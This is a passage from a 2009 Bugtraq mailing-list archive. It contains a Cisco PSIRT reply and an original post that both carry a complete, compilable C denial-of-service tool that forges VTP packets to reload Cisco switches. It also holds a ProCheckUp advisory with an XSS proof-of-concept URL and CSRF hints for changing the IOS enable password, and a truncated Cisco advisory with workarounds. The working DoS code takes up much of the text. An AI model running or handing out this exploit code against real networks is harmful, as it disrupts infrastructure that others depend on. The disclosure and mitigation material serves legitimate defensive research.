 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFJbRVSmqjQ0CJFipgRAt23AJ43dVc9u32PRtOsFf8+xdJzSIx+wACdFIK3
LT/YaZTGtZnOdbhIr2LV9dg#nb
-----END PGP SIGNATURE-----

From - Wed Jan 14 13:02:17 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000058d8
X-Mozilla-Status: 0011
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39163-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id AAA07EC14D
for <lists@securityspace.com>; Wed, 14 Jan 2009 12:52:34 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id A7CF02373A8; Wed, 14 Jan 2009 09:16:55 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 24328 invoked from network); 14 Jan 2009 04:12:48 -0000
X-IronPort-AV: E=Sophos;i="4.37,261,1231113600"; 
   d="scan'208";a="38659566"
X-MimeOLE: Produced By Microsoft Exchange V6.5
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
Subject: RE: DoS code for Cisco VLAN Trunking Protocol Vulnerability
Date: Wed, 14 Jan 2009 11:50:38 +0800
Message-ID: <BFD4D243999BA5458F6A8AC2CB3575050515E7D0@xmb-hkg-416.apac.cisco.com>
In-Reply-To: <a465357d0901131558u6dbca85aqf00758c8001cced4@mail.gmail.com>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: DoS code for Cisco VLAN Trunking Protocol Vulnerability
thread-index: Acl12uWGulbYpOkXSo+7APPNNb0b3wAIDjWw
References: <a465357d0901131558u6dbca85aqf00758c8001cced4@mail.gmail.com>
From: "Paul Oxman (poxman)" <poxman@cisco.com>
To: "showrun.lee" <showrun.lee@gmail.com>,
<bugtraq@securityfocus.com>, <full-disclosure@lists.grok.org.uk>
X-OriginalArrivalTime: 14 Jan 2009 03:52:29.0056 (UTC) FILETIME=[854F0800:01C975FB]
DKIM-Signature: v=1; a=rsa-sha256; q=dns/txt; lg23; t31905154; x32769154;
c=relaxed/simple; s=hkgdkim1002;
h=Content-Type:From:Subject:Content-Transfer-Encoding:MIME-Version;
d=cisco.com; i=poxman@cisco.com;
z=From: "Paul Oxman (poxman)" <poxman@cisco.com>
|Subject: RE: DoS code for Cisco VLAN Trunk
ing Protocol Vulnerability
|Sender: ;
bh=+JKXu/UzBbsom/2el0/Lqwkb86x1jrpTORtxroeY88o=;
b=ODT2KBK9RKEjxQrpSUsC/m+mYoXVLqfhnO/5aPetiBB6XOz/J98nlmaS1H
FbipWiK/a4KaVpfSVRTkOG5NPfbaJdEsat9mXb99vPEWV3BgUVjQm/fwFXjA
KAagIDTEZs9xGi9yhrzkt9hiXUhP2yUR2a7Xb3jq7DeUThuA+ka48=;
Authentication-Results: hkg-dkim-1; header.DKIM-Signature=poxman@cisco.com; dkimil (
DNS lookup for cisco.com/hkgdkim1002 failed; cisco.com/hkgdk
im1002 fail; ); 
header.From=poxman@cisco.com; dkim=neutral
Status:   

 
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hello,
This is Paul Oxman with Cisco PSIRT.

For mitigations and workarounds, please consult the Cisco 
Security Response available at: 
http://www.cisco.com/warp/public/707/cisco-sr-20081105-vtp.shtml

Regards

________________________________

From: showrun.lee [mailto:showrun.lee@gmail.com] 
Sent: Wednesday, January 14, 2009 7:59 AM
To: bugtraq@securityfocus.com; full-disclosure@lists.grok.org.uk
Cc: Paul Oxman (poxman)
Subject: DoS code for Cisco VLAN Trunking Protocol Vulnerability


/*DoS code for Cisco VLAN Trunking Protocol Vulnerability
 *
 *vulerability discription:
 *http://www.cisco.com/warp/public/707/cisco-sr-20081105-vtp.shtml
 *
 *To Known:
 * 1.the switch must in Server/Client Mode.
 * 2.the port ,attacker connected,must be in trunk Mode.
 *   Cisco Ethernet ports with no configuration are not 
 *   in trunk.but trunk mode can be obtained through DTP
 *   attack by Yersinia.
 * 3.you must known the vtp domain,this can be sniffed
 * 4.some codes are from Yersinia.
 *
 *Result:
 * switch reload.
 *
 *
 *Compile:
 * gcc -o vtp `libnet-config --libs` vtp.c
 * 
 *Usage:vtp -i <interface> -d <vtp_domain>
 *
 *Contact: showrun.lee[AT]gmail.com
 *http://sh0wrun.blogspot.com/
 */
#include <libnet.h>
#include <stdio.h>
#include <stdlib.h>

#define VTP_DOMAIN_SIZE    32
#define VTP_TIMESTAMP_SIZE 12

struct vtp_summary {
     u_int8_t  version;
     u_int8_t  code;
     u_int8_t  followers;
     u_int8_t  dom_len;
     u_int8_t  domain[VTP_DOMAIN_SIZE];
     u_int32_t revision;
     u_int32_t updater;
     u_int8_t  timestamp[VTP_TIMESTAMP_SIZE];
     u_int8_t  md5[16];
};

struct vtp_subset {
     u_int8_t  version;
     u_int8_t  code;
     u_int8_t  seq;
     u_int8_t  dom_len;
     u_int8_t  domain[VTP_DOMAIN_SIZE];
     u_int32_t revision;
};

void usage( char *s) {
    printf("%s -i <interface> -d <vtp domain>\n",s);
    exit (1);
}

int main( int argc, char *argv[] )
{
    int opt,k=0;
    extern char *optarg;
    libnet_ptag_t t;
    libnet_t *lhandler;
    u_int32_t vtp_len=0, sent;
    struct vtp_summary *vtp_summ;
    struct vtp_subset *vtp_sub;
    u_int8_t *vtp_packet,*vtp_packet2, *aux;
    u_int8_t cisco_data[]={ 0x00, 0x00, 0x0c, 0x20, 0x03 };
    u_int8_t dst_mac[6]={ 0x01,0x00,0x0c,0xcc,0xcc,0xcc };
    u_int8_t aaa[8]={ 0x22,0x00,0x11,0x22,0x11,0x00,0x00,0x00 };
    struct libnet_ether_addr *mymac;
    char *device;
    char error_information[LIBNET_ERRBUF_SIZE];
    char *domain;

// get options
     while ((opt = getopt(argc, argv, "i:d:")) != -1)
     {
          switch (opt) {
          case 'i':
          device=malloc(strlen(optarg));
          strcpy(device,optarg);
      k=1;
          break;

          case 'd':
          domain=malloc(strlen(optarg));
          strcpy(domain,optarg);
          break;
          
          default: usage(argv[0]);
          }
     }
     if(!k) { printf("  %s -i <interface> -d <vtp domain>\n     must
assign the interface\n",argv[0]);exit(1);}

//init libnet

    lhandler=libnet_init(LIBNET_LINK,device,error_information);
    if (!lhandler) {
             fprintf(stderr, "libnet_init: %s\n", error_information);
             return -1;
     }

    mymac=libnet_get_hwaddr(lhandler);
//build the first packet for vtp_summary
    vtp_len = sizeof(cisco_data)+sizeof(struct vtp_summary);
    vtp_packet = calloc(1,vtp_len);
    aux = vtp_packet;
    memcpy(vtp_packet,cisco_data,sizeof(cisco_data));
    aux+=sizeof(cisco_data);
    vtp_summ = (struct vtp_summary *)aux;
    vtp_summ->version = 0x01;
    vtp_summ->code = 0x01;//vtp_summary
    vtp_summ->followers = 0x01;
    vtp_summ->dom_len = strlen(domain);
    memcpy(vtp_summ->domain,domain,strlen(domain));
    vtp_summ->revision = htonl(2000);//bigger than the current revision
number will ok 
    t = libnet_build_802_2(
        0xaa,            /* DSAP */
        0xaa,            /* SSAP */
        0x03,            /* control */
        vtp_packet,      /* payload */
        vtp_len,         /* payload size */
        lhandler,        /* libnet handle */
        0);              /* libnet id */
    t = libnet_build_802_3(
        dst_mac,       /* ethernet destination */
        mymac->ether_addr_octet,     /* ethernet source */
        LIBNET_802_2_H + vtp_len, /* frame size */
        NULL,                     /* payload */
        0,                        /* payload size */
        lhandler,                 /* libnet handle */
        0);                       /* libnet id */

     sent = libnet_write(lhandler);

     if (sent == -1) {
        libnet_clear_packet(lhandler);
        free(vtp_packet);
        return -1;
     }
     libnet_clear_packet(lhandler);
     
//build the second vtp packet for vtp_subset 
     vtp_len = sizeof(cisco_data)+sizeof(struct vtp_subset);
     vtp_packet2 = calloc(1,vtp_len);
     aux = vtp_packet2;
     memcpy(vtp_packet2,cisco_data,sizeof(cisco_data));
     aux+=sizeof(cisco_data);
     
     vtp_sub = (struct vtp_subset *)aux;
     vtp_sub->version = 0x01;
     vtp_sub->code = 0x02; //vtp_subset
     vtp_sub->seq = 0x01;
     vtp_sub->dom_len = strlen(domain);
     memcpy(vtp_sub->domain,domain,strlen(domain)); 
     vtp_sub->revision = htonl(2000);//bigger than the current revision
number will ok
//     memcpy(vtp_sub->aaa,aaa,strlen(aaa)); 
     
    t = libnet_build_802_2(
        0xaa,            /* DSAP */
        0xaa,            /* SSAP */
        0x03,            /* control */
        vtp_packet2,      /* payload */
        vtp_len,         /* payload size */
        lhandler,        /* libnet handle */
        0);              /* libnet id */
    t = libnet_build_802_3(
        dst_mac,       /* ethernet destination */
        mymac->ether_addr_octet,     /* ethernet source */
        LIBNET_802_2_H + vtp_len, /* frame size */
        NULL,                     /* payload */
        0,                        /* payload size */
        lhandler,                 /* libnet handle */
        0);                       /* libnet id */

     sent = libnet_write(lhandler);
     if (sent == -1) {
        libnet_clear_packet(lhandler);
        free(vtp_packet);
        return -1;
     }
     libnet_clear_packet(lhandler);
}


-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1

iQA/AwUBSW1hDvOp/xnPFP7gEQKwFQCfQ32qUNzWFL8dISsQew6+JQAFcnoAnRKq
yEEThaENUXT3HaLpVs+mdMHD
=U4Vq
-----END PGP SIGNATURE-----

From - Wed Jan 14 13:02:18 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000058d9
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39172-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 8B783EC14F
for <lists@securityspace.com>; Wed, 14 Jan 2009 12:54:40 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 03052143A4D; Wed, 14 Jan 2009 09:33:17 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 31162 invoked from network); 14 Jan 2009 11:12:38 -0000
Message-ID: <496DCE62.7070502@procheckup.com>
Date: Wed, 14 Jan 2009 11:37:06 +0000
From: ProCheckUp Research <research@procheckup.com>
User-Agent: Thunderbird 2.0.0.19 (X11/20081209)
MIME-Version: 1.0
To: <bugtraq@securityfocus.com>
Subject: PR08-19: XSS on Cisco IOS HTTP Server
Content-Type: text/plain; charset="ISO-8859-1"
Content-Transfer-Encoding: 7bit
Status:   

PR08-19: XSS on Cisco IOS HTTP Server

Date found: 1st August 2008

Vendor contacted: 1st August 2008

Advisory publicly released: 14th January 2009

Severity: Medium

Credits: Adrian Pastor of ProCheckUp Ltd (www.procheckup.com)

Description:

Cisco IOS HTTP server is vulnerable to XSS within invalid parameters
processed by the "/ping" server-side binary/script.


Consequences:

An attacker may be able to cause execution of malicious scripting code
in the browser of a user who clicks on a link to the HTTP server of a
Cisco device.

This type of attack can result in non-persistent defacement of the
target admin interface, or the redirection of confidential information
to unauthorised third parties. i.e.: by scraping the data returned by
the '/level/15/exec/-/show/run/CR' URL via the XMLHttpRequest object.

It might also be possible to perform administrative changes by
submitting forged commands (CSRF) within the payload of the XSS attack.
i.e.: injecting an 'img' tag which points to
'/level/15/configure/-/enable/secret/newpass' would change the enable
password to 'newpass'.


Notes:

1. The victim administrator needs to be currently authenticated for this
vulnerability to be exploitable

2. In order to exploit this vulnerability successfully, the attacker
only needs to know the IP address of the Cisco device. There is NO need
to have access to the IOS HTTP server

Proof of concept (PoC):

http://192.168.100.1/ping?<script>alert("Running+code+within+the_context+of+"%2bdocument.domain)</script>


Content of HTML body returned:

<BODY BGCOLOR=#FFFFFF><H2>test-router</H2><HR><DT>Error: URL syntax:
?<script>alert("Running code within the_context of
"+document.domain)</script></BODY>

Successfully tested on:

Cisco 1803
Cisco IOS Software, C180X Software (C180X-ADVIPSERVICESK9-M), Version
12.4(6)T7, RELEASE SOFTWARE (fc5)


Assigned Cisco Bug ID#:

CSCsr72301

CVE reference:

CVE-2008-3821


References:

http://www.procheckup.com/vulnerability_manager/vulnerabilities/pr08-19
http://www.cisco.com/warp/public/707/cisco-sr-20090114-http.shtml

Fix:

Please see Cisco advisory for information on available updates.


Legal:

Copyright 2009 ProCheckUp Ltd. All rights reserved.

Permission is granted for copying and circulating this Bulletin to the
Internet community for the purpose of alerting them to problems, if and
only if the Bulletin is not changed or edited in any way, is attributed
to ProCheckUp indicating this web page URL, and provided such
reproduction and/or distribution is performed for non-commercial purposes.

Any other use of this information is prohibited. ProCheckUp is not
liable for any misuse of this information by any third party. ProCheckUp
is not responsible for the content of external Internet sites.

From - Wed Jan 14 13:12:18 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000058da
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39164-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id BE426EC144
for <lists@securityspace.com>; Wed, 14 Jan 2009 13:07:37 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 62B7E2373B7; Wed, 14 Jan 2009 09:17:17 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 24724 invoked from network); 14 Jan 2009 04:43:20 -0000
Date: 14 Jan 2009 05:07:03 -0000
Message-ID: <20090114050703.20375.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.411 (Entity 5.404)
From: showrun.lee@gmail.com
To: bugtraq@securityfocus.com
Subject: DoS code for Cisco VLAN Trunking Protocol Vulnerability
Status:   

/*DoS code for Cisco VLAN Trunking Protocol Vulnerability
 *
 *vulerability discription:
 *http://www.cisco.com/warp/public/707/cisco-sr-20081105-vtp.shtml
 *
 *To Known:
 * 1.the switch must in Server/Client Mode.
 * 2.the port ,attacker connected,must be in trunk Mode.
 *   Cisco Ethernet ports with no configuration are not
 *   in trunk.but trunk mode can be obtained through DTP
 *   attack by Yersinia.
 * 3.you must known the vtp domain,this can be sniffed
 * 4.some codes are from Yersinia.
 *
 *Result:
 * switch reload.
 *
 *
 *Compile:
 * gcc -o vtp `libnet-config --libs` vtp.c
 *
 *Usage:vtp -i <interface> -d <vtp_domain>
 *
 *Contact: showrun.lee[AT]gmail.com
 *http://sh0wrun.blogspot.com/
 */
#include <libnet.h>
#include <stdio.h>
#include <stdlib.h>

#define VTP_DOMAIN_SIZE    32
#define VTP_TIMESTAMP_SIZE 12

struct vtp_summary {
     u_int8_t  version;
     u_int8_t  code;
     u_int8_t  followers;
     u_int8_t  dom_len;
     u_int8_t  domain[VTP_DOMAIN_SIZE];
     u_int32_t revision;
     u_int32_t updater;
     u_int8_t  timestamp[VTP_TIMESTAMP_SIZE];
     u_int8_t  md5[16];
};

struct vtp_subset {
     u_int8_t  version;
     u_int8_t  code;
     u_int8_t  seq;
     u_int8_t  dom_len;
     u_int8_t  domain[VTP_DOMAIN_SIZE];
     u_int32_t revision;
};

void usage( char *s) {
    printf("%s -i <interface> -d <vtp domain>\n",s);
    exit (1);
}

int main( int argc, char *argv[] )
{
    int opt,k=0;
    extern char *optarg;
    libnet_ptag_t t;
    libnet_t *lhandler;
    u_int32_t vtp_len=0, sent;
    struct vtp_summary *vtp_summ;
    struct vtp_subset *vtp_sub;
    u_int8_t *vtp_packet,*vtp_packet2, *aux;
    u_int8_t cisco_data[]={ 0x00, 0x00, 0x0c, 0x20, 0x03 };
    u_int8_t dst_mac[6]={ 0x01,0x00,0x0c,0xcc,0xcc,0xcc };
    u_int8_t aaa[8]={ 0x22,0x00,0x11,0x22,0x11,0x00,0x00,0x00 };
    struct libnet_ether_addr *mymac;
    char *device;
    char error_information[LIBNET_ERRBUF_SIZE];
    char *domain;

// get options
     while ((opt = getopt(argc, argv, "i:d:")) != -1)
     {
          switch (opt) {
          case 'i':
          device=malloc(strlen(optarg));
          strcpy(device,optarg);
      k=1;
          break;

          case 'd':
          domain=malloc(strlen(optarg));
          strcpy(domain,optarg);
          break;
         
          default: usage(argv[0]);
          }
     }
     if(!k) { printf("  %s -i <interface> -d <vtp domain>\n     must assign the interface\n",argv[0]);exit(1);}

//init libnet

    lhandler=libnet_init(LIBNET_LINK,device,error_information);
    if (!lhandler) {
             fprintf(stderr, "libnet_init: %s\n", error_information);
             return -1;
     }

    mymac=libnet_get_hwaddr(lhandler);
//build the first packet for vtp_summary
    vtp_len = sizeof(cisco_data)+sizeof(struct vtp_summary);
    vtp_packet = calloc(1,vtp_len);
    aux = vtp_packet;
    memcpy(vtp_packet,cisco_data,sizeof(cisco_data));
    aux+=sizeof(cisco_data);
    vtp_summ = (struct vtp_summary *)aux;
    vtp_summ->version = 0x01;
    vtp_summ->code = 0x01;//vtp_summary
    vtp_summ->followers = 0x01;
    vtp_summ->dom_len = strlen(domain);
    memcpy(vtp_summ->domain,domain,strlen(domain));
    vtp_summ->revision = htonl(2000);//bigger than the current revision number will ok
    t = libnet_build_802_2(
        0xaa,            /* DSAP */
        0xaa,            /* SSAP */
        0x03,            /* control */
        vtp_packet,      /* payload */
        vtp_len,         /* payload size */
        lhandler,        /* libnet handle */
        0);              /* libnet id */
    t = libnet_build_802_3(
        dst_mac,       /* ethernet destination */
        mymac->ether_addr_octet,     /* ethernet source */
        LIBNET_802_2_H + vtp_len, /* frame size */
        NULL,                     /* payload */
        0,                        /* payload size */
        lhandler,                 /* libnet handle */
        0);                       /* libnet id */

     sent = libnet_write(lhandler);

     if (sent == -1) {
        libnet_clear_packet(lhandler);
        free(vtp_packet);
        return -1;
     }
     libnet_clear_packet(lhandler);
    
//build the second vtp packet for vtp_subset
     vtp_len = sizeof(cisco_data)+sizeof(struct vtp_subset);
     vtp_packet2 = calloc(1,vtp_len);
     aux = vtp_packet2;
     memcpy(vtp_packet2,cisco_data,sizeof(cisco_data));
     aux+=sizeof(cisco_data);
    
     vtp_sub = (struct vtp_subset *)aux;
     vtp_sub->version = 0x01;
     vtp_sub->code = 0x02; //vtp_subset
     vtp_sub->seq = 0x01;
     vtp_sub->dom_len = strlen(domain);
     memcpy(vtp_sub->domain,domain,strlen(domain));
     vtp_sub->revision = htonl(2000);//bigger than the current revision number will ok
//     memcpy(vtp_sub->aaa,aaa,strlen(aaa));
    
    t = libnet_build_802_2(
        0xaa,            /* DSAP */
        0xaa,            /* SSAP */
        0x03,            /* control */
        vtp_packet2,      /* payload */
        vtp_len,         /* payload size */
        lhandler,        /* libnet handle */
        0);              /* libnet id */
    t = libnet_build_802_3(
        dst_mac,       /* ethernet destination */
        mymac->ether_addr_octet,     /* ethernet source */
        LIBNET_802_2_H + vtp_len, /* frame size */
        NULL,                     /* payload */
        0,                        /* payload size */
        lhandler,                 /* libnet handle */
        0);                       /* libnet id */

     sent = libnet_write(lhandler);
     if (sent == -1) {
        libnet_clear_packet(lhandler);
        free(vtp_packet);
        return -1;
     }
     libnet_clear_packet(lhandler);
}

From - Wed Jan 14 13:22:18 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000058db
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39174-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id F2899EC0EC
for <lists@securityspace.com>; Wed, 14 Jan 2009 13:19:33 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 2A462143AF4; Wed, 14 Jan 2009 09:34:05 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 3026 invoked from network); 14 Jan 2009 15:56:11 -0000
X-TACSUNS: Virus Scanned
Sender: nobody@cisco.com
From: Cisco Systems Product Security Incident Response Team <psirt@cisco.com>
To: bugtraq@securityfocus.com
Cc: psirt@cisco.com
Subject: Cisco Security Response: Cisco IOS Cross-Site Scripting Vulnerabilities
Date: Wed, 14 Jan 2009 17:00:00 +0100
Message-id: <200901141700.http@psirt.cisco.com>
Reply-To: psirt@cisco.com
Errors-To: nobody@cisco.com
MIME-Version: 1.0
Content-Type: Text/Plain; charset="us-ascii"
Content-Transfer-Encoding: 8bit
Prevent-NonDelivery-Report: 
Content-Return: Prohibited
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Cisco Security Response: Cisco IOS Cross-Site Scripting
Vulnerabilities

http://www.cisco.com/warp/public/707/cisco-sr-20090114-http.shtml

Revision 1.0

For Public Release 2009 January 14 1600 UTC (GMT)

- ---------------------------------------------------------------------

Cisco Response
=============
Two separate Cisco IOS  Hypertext Transfer Protocol (HTTP) cross-site
scripting (XSS) vulnerabilities have been reported to Cisco by two
independent researchers. ProCheckup has posted a Security Advisory
titled "XSS on Cisco IOS HTTP Server" posted at 
http://www.procheckup.com/vulnerability_manager/vulnerabilities/pr08-19

Cisco would like to thank Adrian Pastor and Richard J. Brain of
ProCheckUp and Nobuhiro Tsuji of NTT Data Security Corporation with
co-operation of JPCert.

This Cisco Security Response is posted at the following link: 
http://www.cisco.com/warp/public/707/cisco-sr-20090114-http.shtml

Additional Information
=====================
This response covers two separate cross-site scripting
vulnerabilities within the Cisco IOS Hypertext Transfer Protocol
(HTTP) server (including HTTP secure server - here after referred to
as purely HTTP Server) and applies to all Cisco products that run
Cisco IOS Software versions 11.0 through 12.4 with the HTTP server
enabled. A system that contains the IOS HTTP server or HTTP secure
server, but does not have it enabled, is not affected.

To determine if the HTTP server is running on your device, issue the
show ip http server status | include status and the show ip http
server secure status | include status commands at the prompt and look
for output similar to:

    Router#show ip http server status | include status
    HTTP server status: Enabled
    HTTP secure server status: Enabled

If the device is not running the HTTP server, you should see output
similar to:

    Router#show ip http server status | include status
    HTTP server status: Disabled
    HTTP secure server status: Disabled

These vulnerabilities are documented in the following Cisco bug IDs:

  * Cisco bug ID CSCsi13344 - XSS in IOS HTTP Server 
    Special Characters are not escaped in URL strings sent to the
    HTTP server.
  * Cisco bug ID CSCsr72301 - XSS in IOS HTTP Server (ping parameter)
    Special Characters are not escaped in URL strings sent to the
    HTTP server, via the ping parameter. The ping parameter is used
    both by external applications such as Router and Security Device
    Manager (SDM) as well as a direct HTTP session to Cisco IOS http
    server. This vulnerability affects 12.1E based trains and all
    Cisco IOS releases after 12.2(13)T.

These vulnerabilities are independent of each other. For a full
solution, download a Cisco IOS version that contains the fixes for
both Cisco bug IDs. These vulnerabilities have been assigned Common
Vulnerabilities and Exposures (CVE) identifier CVE-2008-3821.

Workaround
+---------

If the HTTP server is not used for any legitimate purposes on the
device, it is a best practice to disable it by issuing the following
commands in configure mode:

    no ip http server
    no ip http secure-server

If the HTTP server is required, it is a recommended best practice to
control which hosts may access the HTTP server to only trusted
sources. To control which hosts can access the HTTP server, you can
apply an access list to the HTTP server. To apply an access list to
the HTTP server, use the following command in global configuration
mode:

    ip http access-class {access-list-number | access-list-name}

The following example shows an access list that allows only trusted
hosts to access the Cisco IOS HTTP server:

    ip access-list standard 20
    permit 192.168.1.0 0.0.0.255
    remark "Above is a trusted subnet"
    remark "Add further trusted subnets or hosts below"

    ! (Note: all other access implicitly denied)
    ! (Apply the access-list to the http server)

    ip http access-class 20

For additional information on configuring the Cisco IOS HTTP server,
consult Using the Cisco Web Browser User Interface.

For additional information on cross-site scripting attacks and the
methods used to exploit these vulnerabilities, please refer to the
Cisco Applied Mitigation Bulletin "Understanding Cross-Site Scripting
(XSS) Threat Vectors", which is available at the following link:
http://www.cisco.com/warp/public/707/cisco-amb-20060922-understanding-xss.shtml

Further Problem Description
+--------------------------

This vulnerability is about escaping characters in the URL that are
sent to the HTTP server. This vulnerability is different from the
vulnerability reported in Cisco bug ID CSCsc64976. The fix for this
vulnerability is to escape special characters in the URL string 
echoed in the response generated by the web exec application.

Software Version and Fixes
+-------------------------

When considering software upgrades, also consult 
http://www.cisco.com/go/psirt and any subsequent advisories to 
determine exposure and a complete upgrade solution.

In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center ("TAC") or your contracted
maintenance provider for assistance.

Each row of the Cisco IOS software table (below) describes a release
train and the platforms or products for which it is intended. If a
given release train is vulnerable, then the earliest possible
releases that contain the fix (the "First Fixed Release") and the
anticipated date of availability for each are listed in the "Rebuild"
and "Maintenance" columns. A device running a release in the given
train that is earlier than the release in a specific column (less
than the First Fixed Release) is known to be vulnerable. The release
should be upgraded at least to the indicated release or a later
version (greater than or equal to the First Fixed Release label).

For more information on the terms "Rebuild" and "Maintenance,"
consult the following URL: 
http://www.cisco.com/warp/public/620/1.html

+----------------------------------------+
|   Major    | Availability of Repaired  |
|  Release   |         Releases          |
|------------+---------------------------|
|  Affected  | First Fixed | Recommended |
| 12.0-Based |   Release   |   Release   |
|  Releases  |             |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.0       | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.0DA     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.0DB     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.0DC     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | 12.0(33)S3; |             |
| 12.0S      | Available   |             |
|            | on          |             |
|            | 03-APR-2009 |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.0SC     | first fixed |             |
|            | in 12.0S    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.0SL     | first fixed |             |
|            | in 12.0S    |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.0SP     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.0ST     | first fixed |             |
|            | in 12.0S    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.0SX     | first fixed |             |
|            | in 12.0S    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.0SY     | first fixed |             |
|            | in 12.0S    |             |
|------------+-------------+-------------|
|            | Vulnerable; |             |
| 12.0SZ     | first fixed |             |
|            | in 12.0S    |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.0T      | first fixed | T812.4(23)  |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.0(3c)W5  |
| 12.0W      | first fixed | (8)         |
|            | in 12.4     |             |
|------------+-------------+-------------|
|            | Vulnerable; | 12.4(15)    |
| 12.0WC     | first fixed | T812.4(23)  |
|            | in 12.4     |             |
